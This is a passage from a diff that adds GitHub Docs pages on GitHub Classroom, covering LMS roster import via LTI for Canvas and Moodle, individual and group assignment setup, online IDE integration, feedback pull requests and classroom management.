information, see "[Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms#creating-a-classroom)." ### Supported LMSes {% data variables.product.prodname_classroom %} supports import of roster data from LMSes that implement Learning Tools Interoperability (LTI) standards. - LTI version 1.0 and/or 1.1 - LTI Names and Roles Provisioning 1.X Using LTI helps keep your information safe and secure. LTI is an industry-standard protocol and GitHub Classroom's use of LTI is certified by the Instructional Management System (IMS) Global Learning Consortium. For more information, see [Learning Tools Interoperability](https://www.imsglobal.org/activity/learning-tools-interoperability) and [About IMS Global Learning Consortium](http://www.imsglobal.org/aboutims.html) on the IMS Global Learning Consortium website. {% data variables.product.company_short %} has tested import of roster data from the following LMSes into {% data variables.product.prodname_classroom %}. - Canvas - Google Classroom - Moodle - Sakai Currently, {% data variables.product.prodname_classroom %} doesn't support import of roster data from Blackboard or Brightspace ### Generating configuration credentials for your classroom {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. If your classroom already has a roster, you can either update the roster or delete the roster and create a new roster. - For more information about deleting and creating a roster, see "[Deleting a roster for a classroom](/education/manage-coursework-with-github-classroom/manage-classrooms#deleting-a-roster-for-a-classroom)" and "[Creating a roster for your classroom](/education/manage-coursework-with-github-classroom/manage-classrooms#creating-a-roster-for-your-classroom)." - For more information about updating a roster, see "[Adding students to the roster for your classroom](/education/manage-coursework-with-github-classroom/manage-classrooms#adding-students-to-the-roster-for-your-classroom)." 1. In the list of LMSes, click your LMS. If your LMS is not supported, click **Other LMS**.  1. Read about connecting your LMS, then click **Connect to _LMS_**. 1. Copy the "Consumer Key", "Shared Secret", and "Launch URL" for the connection to the classroom.  ### Configuring a generic LMS You must configure the privacy settings for your LMS to allow external tools to receive roster information. 1. Navigate to your LMS. 1. Configure an external tool. 1. Provide the configuration credentials you generated in {% data variables.product.prodname_classroom %}. - Consumer key - Shared secret - Launch URL (sometimes called "tool URL" or similar) ### Configuring Canvas You can configure {% data variables.product.prodname_classroom %} as an external app for Canvas to import roster data into your classroom. For more information about Canvas, see the [Canvas website](https://www.instructure.com/canvas/). 1. Sign into [Canvas](https://www.instructure.com/canvas/#login). 1. Select the Canvas course to integrate with {% data variables.product.prodname_classroom %}. 1. In the left sidebar, click **Settings**. 1. Click the **Apps** tab. 1. Click **View app configurations**. 1. Click **+App**. 1. Select the **Configuration Type** drop-down menu, and click **By URL**. 1. Paste the configuration credentials from {% data variables.product.prodname_classroom %}. For more information, see "[Generating configuration credentials for your classroom](#generating-configuration-credentials-for-your-classroom)." | Field in Canvas app configuration | Value or setting | | :- | :- | | **Consumer Key** | Consumer key from {% data variables.product.prodname_classroom %} | | **Shared Secret** | Shared secret from {% data variables.product.prodname_classroom %} | | **Allow this tool to access the IMS Names and Role Provisioning Service** | Enabled | | **Configuration URL** | Launch URL from {% data variables.product.prodname_classroom %} | {% note %} **Note**: If you don't see a checkbox in Canvas labeled "Allow this tool to access the IMS Names and Role Provisioning Service", then your Canvas administrator must contact Canvas support to enable membership service configuration for your Canvas account. Without enabling this feature, you won't be able to sync the roster from Canvas. For more information, see [How do I contact Canvas Support?](https://community.canvaslms.com/t5/Canvas-Basics-Guide/How-do-I-contact-Canvas-Support/ta-p/389767) on the Canvas website. {% endnote %} 1. Click **Submit**. 1. In the left sidebar, click **Home**. 1. To prompt Canvas to send a confirmation email, in the left sidebar, click **GitHub Classroom**. Follow the instructions in the email to finish linking {% data variables.product.prodname_classroom %}. ### Configuring Moodle You can configure {% data variables.product.prodname_classroom %} as an activity for Moodle to import roster data into your classroom. For more information about Moodle, see the [Moodle website](https://moodle.org). You must be using Moodle version 3.0 or greater. 1. Sign into [Moodle](https://moodle.org/login/index.php). 1. Select the Moodle course to integrate with {% data variables.product.prodname_classroom %}. 1. Click **Turn editing on**. 1. Wherever you'd like {% data variables.product.prodname_classroom %} to be available in Moodle, click **Add an activity or resource**. 1. Choose **External tool** and click **Add**. 1. In the "Activity name" field, type "GitHub Classroom". 1. In the **Preconfigured tool** field, to the right of the drop-down menu, click **+**. 1. Under "External tool configuration", paste the configuration credentials from {% data variables.product.prodname_classroom %}. For more information, see "[Generating configuration credentials for your classroom](#generating-configuration-credentials-for-your-classroom)." | Field in Moodle app configuration | Value or setting | | :- | :- | | **Tool name** | {% data variables.product.prodname_classroom %} - _YOUR CLASSROOM NAME_<br/><br/>**Note**: You can use any name, but we suggest this value for clarity. | | **Tool URL** | Launch URL from {% data variables.product.prodname_classroom %} | | **LTI version** | LTI 1.0/1.1 | | **Default launch container** | New window | | **Consumer key** | Consumer key from {% data variables.product.prodname_classroom %} | | **Shared secret** | Shared secret from {% data variables.product.prodname_classroom %} | 1. Scroll to and click **Services**. 1. To the right of "IMS LTI Names and Role Provisioning", select the drop-down menu and click **Use this service to retrieve members' information as per privacy settings**. 1. Scroll to and click **Privacy**. 1. To the right of **Share launcher's name with tool** and **Share launcher's email with tool**, select the drop-down menus to click **Always**. 1. At the bottom of the page, click **Save changes**. 1. In the **Preconfigure tool** menu, click **GitHub Classroom - _YOUR CLASSROOM NAME_**. 1. Under "Common module settings", to the right of "Availability", select the drop-down menu and click **Hide from students**. 1. At the bottom of the page, click **Save and return to course**. 1. Navigate to anywhere you chose to display {% data variables.product.prodname_classroom %}, and click the {% data variables.product.prodname_classroom %} activity. ### Importing a roster from your LMS For more information about importing the roster from your LMS into {% data variables.product.prodname_classroom %}, see "[Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms#creating-a-roster-for-your-classroom)." ### Disconnecting your LMS {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-settings %} 1. Under "Connect to a learning management system (LMS)", click **Connection Settings**.  1. Under "Delete Connection to your learning management system", click **Disconnect from your learning management system**.  145 .../education/manage-coursework-with-github-classroom/create-a-group-assignment.md @@ -0,0 +1,145 @@ --- title: Create a group assignment intro: 'You can create a collaborative assignment for teams of students who participate in your course.' versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/create-group-assignments --- ### About group assignments {% data reusables.classroom.assignments-group-definition %} Students can work together on a group assignment in a shared repository, like a team of professional developers. When a student accepts a group assignment, the student can create a new team or join an existing team. {% data variables.product.prodname_classroom %} saves the teams for an assignment as a set. You can name the set of teams for a specific assignment when you create the assignment, and you can reuse that set of teams for a later assignment. {% data reusables.classroom.classroom-creates-group-repositories %} {% data reusables.classroom.about-assignments %} You can decide how many teams one assignment can have, and how many members each team can have. Each team that a student creates for an assignment is a team within your organization on {% data variables.product.product_name %}. The visibility of the team is secret. Teams that you create on {% data variables.product.product_name %} will not appear in {% data variables.product.prodname_classroom %}. For more information, see "[About teams](/github/setting-up-and-managing-organizations-and-teams/about-teams)." For a video demonstration of the creation of a group assignment, see "[Basics of setting up {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom)." ### Prerequisites {% data reusables.classroom.assignments-classroom-prerequisite %} ### Creating an assignment {% data reusables.classroom.assignments-guide-create-the-assignment %} ### Setting up the basics for an assignment Name your assignment, decide whether to assign a deadline, define teams, and choose the visibility of assignment repositories. - [Naming an assignment](#naming-an-assignment) - [Assigning a deadline for an assignment](#assigning-a-deadline-for-an-assignment) - [Choosing an assignment type](#choosing-an-assignment-type) - [Defining teams for an assignment](#defining-teams-for-an-assignment) - [Choosing a visibility for assignment repositories](#choosing-a-visibility-for-assignment-repositories) #### Naming an assignment For a group assignment, {% data variables.product.prodname_classroom %} names repositories by the repository prefix and the name of the team. By default, the repository prefix is the assignment title. For example, if you name an assignment "assignment-1" and the team's name on {% data variables.product.product_name %} is "student-team", the name of the assignment repository for members of the team will be `assignment-1-student-team`. {% data reusables.classroom.assignments-type-a-title %} #### Assigning a deadline for an assignment {% data reusables.classroom.assignments-guide-assign-a-deadline %} #### Choosing an assignment type Under "Individual or group assignment", select the drop-down menu, then click **Group assignment**. You can't change the assignment type after you create the assignment. If you'd rather create a individual assignment, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)." #### Defining teams for an assignment If you've already created a group assignment for the classroom, you can reuse a set of teams for the new assignment. To create a new set with the teams that your students create for the assignment, type the name for the set. Optionally, type the maximum number of team members and total teams. {% tip %} **Tips**: - We recommend including details about the set of teams in the name for the set. For example, if you want to use the set of teams for one assignment, name the set after the assignment. If you want to reuse the set throughout a semester or course, name the set after the semester or course. - If you'd like to assign students to a specific team, give your students a name for the team and provide a list of members. {% endtip %}  #### Choosing a visibility for assignment repositories {% data reusables.classroom.assignments-guide-choose-visibility %} {% data reusables.classroom.assignments-guide-click-continue-after-basics %} ### Adding starter code and configuring a development environment {% data reusables.classroom.assignments-guide-intro-for-environment %} - [Choosing a template repository](#choosing-a-template-repository) - [Choosing an online integrated development environment (IDE)](#choosing-an-online-integrated-development-environment-ide) #### Choosing a template repository By default, a new assignment will create an empty repository for each team that a student creates. {% data reusables.classroom.you-can-choose-a-template-repository %} For more information about template repositories, see "[Creating a template repository](/github/creating-cloning-and-archiving-repositories/creating-a-template-repository)." {% data reusables.classroom.assignments-guide-choose-template-repository %} #### Choosing an online integrated development environment (IDE) {% data reusables.classroom.about-online-ides %} For more information, see "[Integrate {% data variables.product.prodname_classroom %} with an IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide)." {% data reusables.classroom.assignments-guide-choose-an-online-ide %} {% data reusables.classroom.assignments-guide-click-continue-after-starter-code-and-feedback %} ### Providing feedback Optionally, you can automatically grade assignments and create a space for discussing each submission with the team. - [Testing assignments automatically](#testing-assignments-automatically) - [Preventing changes to important files](#preventing-changes-to-important-files) - [Creating a pull request for feedback](#creating-a-pull-request-for-feedback) #### Testing assignments automatically {% data reusables.classroom.assignments-guide-using-autograding %} #### Preventing changes to important files {% data reusables.classroom.assignments-guide-prevent-changes %} #### Creating a pull request for feedback {% data reusables.classroom.you-can-create-a-pull-request-for-feedback %} {% data reusables.classroom.assignments-guide-create-review-pull-request %} {% data reusables.classroom.assignments-guide-click-create-assignment-button %} ### Inviting students to an assignment {% data reusables.classroom.assignments-guide-invite-students-to-assignment %} You can see the teams that are working on or have submitted an assignment in the **Teams** tab for the assignment. {% data reusables.classroom.assignments-to-prevent-submission %} <div class="procedural-image-wrapper"> <img alt="Group assignment" class="procedural-image-wrapper" src="/assets/images/help/classroom/assignment-group-hero.png"> </div> ### Next steps - After you create the assignment and your students form teams, team members can start work on the assignment using Git and {% data variables.product.product_name %}'s features. Students can clone the repository, push commits, manage branches, create and review pull requests, address merge conflicts, and discuss changes with issues. Both you and the team can review the commit history for the repository. For more information, see "[Getting started with {% data variables.product.prodname_dotcom %}](/github/getting-started-with-github)," "[Creating, cloning, and archiving repositories](/github/creating-cloning-and-archiving-repositories)," "[Using Git](/github/using-git)," and "[Collaborating with issues and pull requests](/github/collaborating-with-issues-and-pull-requests)," and the free course on [managing merge conflicts](https://lab.github.com/githubtraining/managing-merge-conflicts) from {% data variables.product.prodname_learning %}. - When a team finishes an assignment, you can review the files in the repository, or you can review the history and visualizations for the repository to better understand how the team collaborated. For more information, see "[Visualizing repository data with graphs](/github/visualizing-repository-data-with-graphs)." - You can provide feedback for an assignment by commenting on individual commits or lines in a pull request. For more information, see "[Commenting on a pull request](/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request)" and "[Opening an issue from code](/github/managing-your-work-on-github/opening-an-issue-from-code)." For more information about creating saved replies to provide feedback for common errors, see "[About saved replies](/github/writing-on-github/about-saved-replies)." ### Further reading - "[Use {% data variables.product.prodname_dotcom %} in your classroom and research](/education/teach-and-learn-with-github-education/use-github-in-your-classroom-and-research)" - "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)" - [Using Existing Teams in Group Assignments?](https://education.github.community/t/using-existing-teams-in-group-assignments/6999) in the {% data variables.product.prodname_education %} Community 19 ...sework-with-github-classroom/create-an-assignment-from-a-template-repository.md @@ -0,0 +1,19 @@ --- title: Create an assignment from a template repository intro: You can create an assignment from a template repository to provide starter code, documentation, and other resources to your students. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/using-template-repos-for-assignments --- You can use a template repository on {% data variables.product.product_name %} as starter code for an assignment on {% data variables.product.prodname_classroom %}. Your template repository can contain boilerplate code, documentation, and other resources for your students. For more information, see "[Creating a template repository](/github/creating-cloning-and-archiving-repositories/creating-a-template-repository)." To use the template repository for your assignment, the template repository must be owned by your organization, or the visibility of the template repository must be public. {% data reusables.classroom.you-may-want-to-predefine-repository-settings %} For more information, see "[Configure default settings for assignment repositories](/education/manage-coursework-with-github-classroom/configure-default-settings-for-assignment-repositories)." ### Further reading - "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)" - "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)" 124 ...tion/manage-coursework-with-github-classroom/create-an-individual-assignment.md @@ -0,0 +1,124 @@ --- title: Create an individual assignment intro: You can create an assignment for students in your course to complete individually. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/creating-an-individual-assignment - /education/manage-coursework-with-github-classroom/create-an-individual-assignment --- ### About individual assignments {% data reusables.classroom.assignments-individual-definition %} {% data reusables.classroom.classroom-creates-individual-repositories %} {% data reusables.classroom.about-assignments %} For a video demonstration of the creation of an individual assignment, see "[Basics of setting up {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/basics-of-setting-up-github-classroom)." ### Prerequisites {% data reusables.classroom.assignments-classroom-prerequisite %} ### Creating an assignment {% data reusables.classroom.assignments-guide-create-the-assignment %} ### Setting up the basics for an assignment Name your assignment, decide whether to assign a deadline, and choose the visibility of assignment repositories. - [Naming an assignment](#naming-an-assignment) - [Assigning a deadline for an assignment](#assigning-a-deadline-for-an-assignment) - [Choosing an assignment type](#choosing-an-assignment-type) - [Choosing a visibility for assignment repositories](#choosing-a-visibility-for-assignment-repositories) #### Naming an assignment For an individual assignment, {% data variables.product.prodname_classroom %} names repositories by the repository prefix and the student's {% data variables.product.product_name %} username. By default, the repository prefix is the assignment title. For example, if you name an assignment "assignment-1" and the student's username on {% data variables.product.product_name %} is @octocat, the name of the assignment repository for @octocat will be `assignment-1-octocat`. {% data reusables.classroom.assignments-type-a-title %} #### Assigning a deadline for an assignment {% data reusables.classroom.assignments-guide-assign-a-deadline %} #### Choosing an assignment type Under "Individual or group assignment", select the drop-down menu, and click **Individual assignment**. You can't change the assignment type after you create the assignment. If you'd rather create a group assignment, see "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." #### Choosing a visibility for assignment repositories {% data reusables.classroom.assignments-guide-choose-visibility %} {% data reusables.classroom.assignments-guide-click-continue-after-basics %} ### Adding starter code and configuring a development environment {% data reusables.classroom.assignments-guide-intro-for-environment %} - [Choosing a template repository](#choosing-a-template-repository) - [Choosing an online integrated development environment (IDE)](#choosing-an-online-integrated-development-environment-ide) #### Choosing a template repository By default, a new assignment will create an empty repository for each student on the roster for the classroom. {% data reusables.classroom.you-can-choose-a-template-repository %} For more information about template repositories, see "[Creating a template repository](/github/creating-cloning-and-archiving-repositories/creating-a-template-repository)." {% data reusables.classroom.assignments-guide-choose-template-repository %} {% data reusables.classroom.assignments-guide-click-continue-after-starter-code-and-feedback %} #### Choosing an online integrated development environment (IDE) {% data reusables.classroom.about-online-ides %} For more information, see "[Integrate {% data variables.product.prodname_classroom %} with an IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide)." {% data reusables.classroom.assignments-guide-choose-an-online-ide %} ### Providing feedback for an assignment Optionally, you can automatically grade assignments and create a space for discussing each submission with the student. - [Testing assignments automatically](#testing-assignments-automatically) - [Preventing changes to important files](#preventing-changes-to-important-files) - [Creating a pull request for feedback](#creating-a-pull-request-for-feedback) #### Testing assignments automatically {% data reusables.classroom.assignments-guide-using-autograding %} #### Preventing changes to important files {% data reusables.classroom.assignments-guide-prevent-changes %} #### Creating a pull request for feedback {% data reusables.classroom.you-can-create-a-pull-request-for-feedback %} {% data reusables.classroom.assignments-guide-create-review-pull-request %} {% data reusables.classroom.assignments-guide-click-create-assignment-button %} ### Inviting students to an assignment {% data reusables.classroom.assignments-guide-invite-students-to-assignment %} You can see whether a student has joined the classroom and accepted or submitted an assignment in the **All students** tab for the assignment. {% data reusables.classroom.assignments-to-prevent-submission %} <div class="procedural-image-wrapper"> <img alt="Individual assignment" class="procedural-image-wrapper" src="/assets/images/help/classroom/assignment-individual-hero.png"> </div> ### Next steps - Once you create the assignment, students can start work on the assignment using Git and {% data variables.product.product_name %}'s features. Students can clone the repository, push commits, manage branches, create and review pull requests, address merge conflicts, and discuss changes with issues. Both you and student can review the commit history for the repository. For more information, see "[Getting started with {% data variables.product.prodname_dotcom %}](/github/getting-started-with-github)," "[Creating, cloning, and archiving repositories](/github/creating-cloning-and-archiving-repositories)," "[Using Git](/github/using-git)," and "[Collaborating with issues and pull requests](/github/collaborating-with-issues-and-pull-requests)." - When a student finishes an assignment, you can review the files in the repository, or you can review the history and visualizations for the repository to better understand the student's work. For more information, see "[Visualizing repository data with graphs](/github/visualizing-repository-data-with-graphs)." - You can provide feedback for an assignment by commenting on individual commits or lines in a pull request. For more information, see "[Commenting on a pull request](/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request)" and "[Opening an issue from code](/github/managing-your-work-on-github/opening-an-issue-from-code)." For more information about creating saved replies to provide feedback for common errors, see "[About saved replies](/github/writing-on-github/about-saved-replies)." ### Further reading - "[Use {% data variables.product.prodname_dotcom %} in your classroom and research](/education/teach-and-learn-with-github-education/use-github-in-your-classroom-and-research)" - "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)" 9 ...on/manage-coursework-with-github-classroom/get-started-with-github-classroom.md @@ -0,0 +1,9 @@ --- title: Get started with GitHub Classroom shortTitle: Get started intro: Learn how to configure and use {% data variables.product.prodname_classroom %} to administer your course. mapTopic: true versions: free-pro-team: '*' --- 52 content/education/manage-coursework-with-github-classroom/glossary.md @@ -0,0 +1,52 @@ --- title: Glossary intro: You can review explanations of terminology for {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' --- ### assignment An assignment is coursework in {% data variables.product.prodname_classroom %}. A teacher can assign an assignment to an individual student or a group of students. Teachers can import starter code for the assignment, assign students, and create a deadline for each assignment. For more information, see the definitions for "[individual assignment](#individual-assignment)" and "[group assignment](#group-assignment)." --- ### classroom A classroom is the basic unit of {% data variables.product.prodname_classroom %}. Teachers can use a classroom to organize and manage students, teaching assistants, and assignments for a single course. A classroom belongs to an organization on {% data variables.product.prodname_dotcom_the_website %}. To administer a classroom, you must be an organization owner for the organization on {% data variables.product.prodname_dotcom %}. For more information, see "[Manage classrooms](/education/manage-coursework-with-github-classroom/manage-classrooms)." --- ### {% data variables.product.prodname_classroom %} {% data variables.product.prodname_classroom %} is a web application for educators that provides course administration tools integrated with {% data variables.product.prodname_dotcom %}. For more information, see the [{% data variables.product.prodname_classroom %}](https://classroom.github.com/) website. --- ### group assignment {% data reusables.classroom.assignments-group-definition %} For more information, see "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." --- ### identifier An identifier in {% data variables.product.prodname_classroom %} is a unique ID for a student participating in a course. For example, an identifier can be a student name, alphanumeric ID, or email address. --- ### individual assignment {% data reusables.classroom.assignments-individual-definition %} For more information, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)." --- ### roster A roster allows a teacher to manage students and assignment submissions in a classroom on {% data variables.product.prodname_classroom %}. Teachers can create a roster by entering a list of student identifiers, or by connecting {% data variables.product.prodname_classroom %} to a learning management system (LMS). For more information about identifiers, see the definition of "[identifier](#identifier)." For more information about connecting {% data variables.product.prodname_classroom %} to an LMS, see "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)." --- ### Further reading - "[{% data variables.product.prodname_dotcom %} glossary](/github/getting-started-with-github/github-glossary)" 32 content/education/manage-coursework-with-github-classroom/index.md @@ -0,0 +1,32 @@ --- title: Manage coursework with GitHub Classroom shortTitle: '{% data variables.product.prodname_classroom %}' intro: With {% data variables.product.prodname_classroom %}, you can use {% data variables.product.product_name %} to administer or participate in a course about software development. versions: free-pro-team: '*' --- ### Table of Contents {% topic_link_in_list /get-started-with-github-classroom %} {% link_in_list /basics-of-setting-up-github-classroom %} {% link_in_list /glossary %} {% topic_link_in_list /teach-with-github-classroom %} {% link_in_list /manage-classrooms %} {% link_in_list /create-an-individual-assignment %} {% link_in_list /create-a-group-assignment %} {% link_in_list /create-an-assignment-from-a-template-repository %} {% link_in_list /leave-feedback-with-pull-requests %} {% link_in_list /use-autograding %} {% link_in_list /configure-default-settings-for-assignment-repositories %} {% link_in_list /connect-a-learning-management-system-to-github-classroom %} {% topic_link_in_list /integrate-github-classroom-with-an-ide %} {% link_in_list /integrate-github-classroom-with-an-online-ide %} {% link_in_list /about-using-makecode-arcade-with-github-classroom %} {% link_in_list /about-using-replit-with-github-classroom %} {% link_in_list /run-student-code-in-an-online-ide %} {% topic_link_in_list /learn-with-github-classroom %} {% link_in_list /view-autograding-results %} 8 ...nage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide.md @@ -0,0 +1,8 @@ --- title: Integrate GitHub Classroom with an IDE shortTitle: Integrate with an IDE intro: You can help your students write, test, and debug code by preconfiguring a development environment for assignment repositories on {% data variables.product.prodname_classroom %}. mapTopic: true versions: free-pro-team: '*' --- 42 ...ursework-with-github-classroom/integrate-github-classroom-with-an-online-ide.md @@ -0,0 +1,42 @@ --- title: Integrate GitHub Classroom with an online IDE shortTitle: Integrate with an online IDE intro: You can preconfigure a supported online integrated development environment (IDE) for assignments you create in {% data variables.product.prodname_classroom %}. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/online-ide-integrations --- ### About integration with an online IDE {% data reusables.classroom.about-online-ides %} After a student accepts an assignment with an online IDE, the README file in the student's assignment repository will contain a button to open the assignment in the IDE. The student can begin working immediately, and no additional configuration is necessary.  ### Supported online IDEs {% data variables.product.prodname_classroom %} supports the following online IDEs. You can learn more about the student experience for each IDE. | IDE | More information | | :- | :- | | Microsoft MakeCode Arcade | "[About using MakeCode Arcade with {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/about-using-makecode-arcade-with-github-classroom)" | | Repl.it | "[About using Repl.it with GitHub Classroom](/education/manage-coursework-with-github-classroom/about-using-replit-with-github-classroom)" | ### Configuring an online IDE for an assignment You can choose the online IDE you'd like to use for an assignment when you create an assignment. To learn how to create a new assignment that uses an online IDE, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)" or "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." ### Authorizing the OAuth app for an online IDE The first time you configure an assignment with an online IDE, you must authorize the OAuth app for the online IDE for your organization.  For all repositories, grant the app **read** access to metadata, administration, and code, and **write** access to administration and code. For more information, see "[Authorizing OAuth Apps](/github/authenticating-to-github/authorizing-oauth-apps)." ### Further reading - "[About READMEs](/github/creating-cloning-and-archiving-repositories/about-readmes)" 7 ...ducation/manage-coursework-with-github-classroom/learn-with-github-classroom.md @@ -0,0 +1,7 @@ --- title: Learn with GitHub Classroom intro: You can participate in coursework in {% data variables.product.prodname_classroom %} and see results from your teacher. mapTopic: true versions: free-pro-team: '*' --- 33 ...on/manage-coursework-with-github-classroom/leave-feedback-with-pull-requests.md @@ -0,0 +1,33 @@ --- title: Leave feedback with pull requests intro: You can leave feedback for your students in a special pull request within the repository for each assignment. permissions: People with read permissions to a repository can leave feedback in a pull request for the repository. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/leaving-feedback-in-github --- ### About feedback pull requests for assignments {% data reusables.classroom.you-can-create-a-pull-request-for-feedback %} When you enable the pull request for feedback for an assignment, {% data variables.product.prodname_classroom %} will create a special pull request titled **Feedback** in the assignment repository for each student or team. The pull request automatically shows every commit that a student pushed to the assignment repository's default branch. ### Prerequisites To create and access the feedback pull request, you must enable the feedback pull request when you create the assignment. {% data reusables.classroom.for-more-information-about-assignment-creation %} ### Leaving feedback in a pull request for an assignment {% data reusables.classroom.sign-into-github-classroom %} 1. In the list of classrooms, click the classroom with the assignment you want to review.  {% data reusables.classroom.click-assignment-in-list %} 1. To the right of the submission, click **Review**.  1. Review the pull request. For more information, see "[Commenting on a pull request](/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request)." ### Further reading - "[Integrate {% data variables.product.prodname_classroom %} with an IDE](http://localhost:4000/en/free-pro-team@latest/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-ide)" 121 content/education/manage-coursework-with-github-classroom/manage-classrooms.md @@ -0,0 +1,121 @@ --- title: Manage classrooms intro: You can create and manage a classroom for each course that you teach using {% data variables.product.prodname_classroom %}. permissions: Organization owners can manage a classroom for an organization. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/archive-a-classroom --- ### About classrooms {% data reusables.classroom.about-classrooms %}  ### About management of classrooms {% data variables.product.prodname_classroom %} uses organization accounts on {% data variables.product.product_name %} to manage permissions, administration, and security for each classroom that you create. Each organization can have multiple classrooms. After you create a classroom, {% data variables.product.prodname_classroom %} will prompt you to invite teaching assistants (TAs) and admins to the classroom. Each classroom can have one or more admins. Admins can be teachers, TAs, or any other course administrator who you'd like to have control over your classrooms on {% data variables.product.prodname_classroom %}. Invite TAs and admins to your classroom by inviting the user accounts on {% data variables.product.product_name %} to your organization as organization owners and sharing the URL for your classrom. Organization owners can administer any classroom for the organization. For more information, see "[Permission levels for an organization](/github/setting-up-and-managing-organizations-and-teams/permission-levels-for-an-organization)" and "[Inviting users to join your organization](/github/setting-up-and-managing-organizations-and-teams/inviting-users-to-join-your-organization)." When you're done using a classroom, you can archive the classroom and refer to the classroom, roster, and assignments later, or you can delete the classroom if you no longer need the classroom. ### About classroom rosters Each classroom has a roster. A roster is a list of identifiers for the students who participate in your course. When you first share the URL for an assignment with a student, the student must sign into {% data variables.product.product_name %} with a user account to link the user account to an identifier for the classroom. After the student links a user account, you can see the associated user account in the roster. You can also see when the student accepts or submits an assignment.  ### Prerequisites You must have an organization account on {% data variables.product.product_name %} to manage classrooms on {% data variables.product.prodname_classroom %}. For more information, see "[Types of {% data variables.product.company_short %} accounts](/github/getting-started-with-github/types-of-github-accounts#organization-accounts)" and "[Creating a new organization from scratch](/github/setting-up-and-managing-organizations-and-teams/creating-a-new-organization-from-scratch)." You must authorize the OAuth app for {% data variables.product.prodname_classroom %} for your organization to manage classrooms for your organization account. For more information, see "[Authorizing OAuth Apps](/github/authenticating-to-github/authorizing-oauth-apps)." ### Creating a classroom {% data reusables.classroom.sign-into-github-classroom %} 1. Click **New classroom**.  {% data reusables.classroom.guide-create-new-classroom %} After you create a classroom, you can begin creating assignments for students. For more information, see "[Create an individual assignment](/education/manage-coursework-with-github-classroom/create-an-individual-assignment)" or "[Create a group assignment](/education/manage-coursework-with-github-classroom/create-a-group-assignment)." ### Creating a roster for your classroom You can create a roster of the students who participate in your course. If your course already has a roster, you can update the students on the roster or delete the roster. For more information, see "[Adding a student to the roster for your classroom](#adding-students-to-the-roster-for-your-classroom)" or "[Deleting a roster for a classroom](#deleting-a-roster-for-a-classroom)." {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. To connect {% data variables.product.prodname_classroom %} to your LMS and import a roster, click {% octicon "mortar-board" aria-label="The mortar board icon" %} **Import from a learning management system** and follow the instructions. For more information, see "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)."  1. To create a roster manually, type your student identifiers. Optionally, click **Upload a CSV or text file** to upload a file containing the identifiers.  1. Click **Create roster**.  ### Adding students to the roster for your classroom Your classroom must have an existing roster to add students to the roster. For more information about creating a roster, see "[Creating a roster for your classrom](#creating-a-roster-for-your-classroom)." {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. To the right of "Classroom roster", click **Update students**.  1. Follow the instructions to add students to the roster. - To import students from an LMS, click **Sync from a learning management system**. For more information about importing a roster from an LMS, see "[Connect a learning management system to {% data variables.product.prodname_classroom %}](/education/manage-coursework-with-github-classroom/connect-a-learning-management-system-to-github-classroom)." - To manually add students, under "Manually add students", click **Upload a CSV or text file** or type the identifiers for the students, then click **Add roster entries**.  ### Renaming a classroom {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-settings %} 1. Under "Classroom name", type a new name for the classroom.  1. Click **Rename classroom**.  ### Archiving or unarchiving a classroom You can archive a classroom that you no longer use on {% data variables.product.prodname_classroom %}. When you archive a classroom, you can't create new assignments or edit existing assignments for the classroom. Students can't accept invitations to assignments in archived classrooms. {% data reusables.classroom.sign-into-github-classroom %} 1. To the right of a classroom's name, select the {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %} drop-down menu, then click **Archive**.  1. To unarchive a classroom, to the right of a classroom's name, select the {% octicon "kebab-horizontal" aria-label="The horizontal kebab icon" %} drop-down menu, then click **Unarchive**.  ### Deleting a roster for a classroom {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-students %} 1. Under "Delete this roster", click **Delete roster**.  1. Read the warnings, then click **Delete roster**.  ### Deleting a classroom {% data 